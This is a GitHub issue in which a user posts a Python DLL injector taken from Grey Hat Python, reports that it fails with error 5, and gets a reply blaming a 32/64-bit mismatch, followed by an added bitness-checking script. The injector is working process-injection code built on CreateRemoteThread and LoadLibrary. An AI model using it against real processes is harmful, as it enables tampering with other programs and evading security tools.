[!] Failed to inject DLL, exit... 5 #2

Open
LittleHann opened this issue Jan 21, 2017 · 1 comment

Comments

@LittleHann

I met some strange things

mysql code:
```python
#!/usr/bin/python

# Win32 DLL injector from Grey Hat Python
# Minor formatting cleanups done...

import sys
from ctypes import *

print "DLL Injector implementation in Python"
print "Taken from Grey Hat Python"

'''
if (len(sys.argv) != 3):
    print "Usage: %s " %(sys.argv[0])
    print "Eg: %s 1111 C:\test\messagebox.dll" %(sys.argv[0])
    sys.exit(0)
'''

PAGE_READWRITE = 0x04
PROCESS_ALL_ACCESS = ( 0x00F0000 | 0x00100000 | 0xFFF )
VIRTUAL_MEM = ( 0x1000 | 0x2000 )

kernel32 = windll.kernel32
#pid = sys.argv[1]
#dll_path = sys.argv[2]
pid = 2312
dll_path = "C:\Users\Administrator\Desktop\pyplugins\ZhudongFangyu\ImgWalk.dll"

dll_len = len(dll_path)

# Get handle to process being injected...
h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) )

if not h_process:
    print "[!] Couldn't get handle to PID: %s" %(pid)
    print "[!] Are you sure %s is a valid PID?" %(pid)
    sys.exit(0)

# Allocate space for DLL path
arg_address = kernel32.VirtualAllocEx(h_process, 0, dll_len, VIRTUAL_MEM, PAGE_READWRITE)
print "arg_address: ", arg_address

# Write DLL path to allocated space
written = c_int(0)
kernel32.WriteProcessMemory(h_process, arg_address, dll_path, dll_len, byref(written))

# Resolve LoadLibraryA Address
h_kernel32 = kernel32.GetModuleHandleA("kernel32.dll")
h_loadlib = kernel32.GetProcAddress(h_kernel32, "LoadLibraryW")
print "LoadLibraryA: ", h_loadlib

# Now we CreateRemoteThread with entrypoint set to LoadLibraryA and pointer to DLL path as param
thread_id = c_ulong(0)

if not kernel32.CreateRemoteThread(h_process, None, 0, h_loadlib, arg_address, 0, byref(thread_id)):
    print "[!] Failed to inject DLL, exit...", kernel32.GetLastError()
    sys.exit(0)

print "[+] Remote Thread with ID 0x%08x created." %(thread_id.value)
```

When I run it, I get:

```
DLL Injector implementation in Python
Taken from Grey Hat Python
arg_address: 49938432
LoadLibraryA: 1978878195
[!] Failed to inject DLL, exit... 5
```

I don't know what's wrong, can I get some tips?

@numaru

numaru commented Feb 23, 2017

Hello, it looks like you're trying to inject into a 64-bit process while your Python process is x86.

This thread is related.
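
The bitness comparison suggested in the reply above, as an added diagnostic example that is not part of the thread or the project's code. It assumes Python 3 on x86/x64 Windows; the helper names `process_bits`, `diagnose` and `compare_with_pid` are made up for this illustration.

```python
import ctypes
import struct
import sys

PROCESS_QUERY_LIMITED_INFORMATION = 0x1000  # sufficient for IsWow64Process


def process_bits(os_is_64bit, is_wow64):
    """Bitness of a process from the OS bitness and its IsWow64Process flag."""
    return 64 if os_is_64bit and not is_wow64 else 32


def diagnose(caller_bits, target_bits):
    """Say whether the calling process and the target have the same bitness."""
    if caller_bits == target_bits:
        return "match: both processes are %d-bit" % caller_bits
    return "mismatch: %d-bit caller, %d-bit target" % (caller_bits, target_bits)


def _wow64_flag(k32, handle):
    flag = ctypes.c_int(0)  # BOOL out-parameter
    if not k32.IsWow64Process(handle, ctypes.byref(flag)):
        raise ctypes.WinError(ctypes.get_last_error())
    return bool(flag.value)


def compare_with_pid(pid):
    """Windows only: compare this interpreter's bitness with that of `pid`."""
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    # Declare handle types so 64-bit handles are not truncated to int.
    k32.OpenProcess.restype = ctypes.c_void_p
    k32.OpenProcess.argtypes = [ctypes.c_ulong, ctypes.c_int, ctypes.c_ulong]
    k32.GetCurrentProcess.restype = ctypes.c_void_p
    k32.IsWow64Process.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_int)]
    k32.CloseHandle.argtypes = [ctypes.c_void_p]

    caller_bits = struct.calcsize("P") * 8  # pointer size of this interpreter
    # A 64-bit interpreter implies a 64-bit OS; a 32-bit one has to ask.
    os_is_64bit = caller_bits == 64 or _wow64_flag(k32, k32.GetCurrentProcess())

    handle = k32.OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pid)
    if not handle:
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        target_bits = process_bits(os_is_64bit, _wow64_flag(k32, handle))
    finally:
        k32.CloseHandle(handle)
    return diagnose(caller_bits, target_bits)


if __name__ == "__main__" and sys.platform == "win32":
    print(compare_with_pid(int(sys.argv[1])))
```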
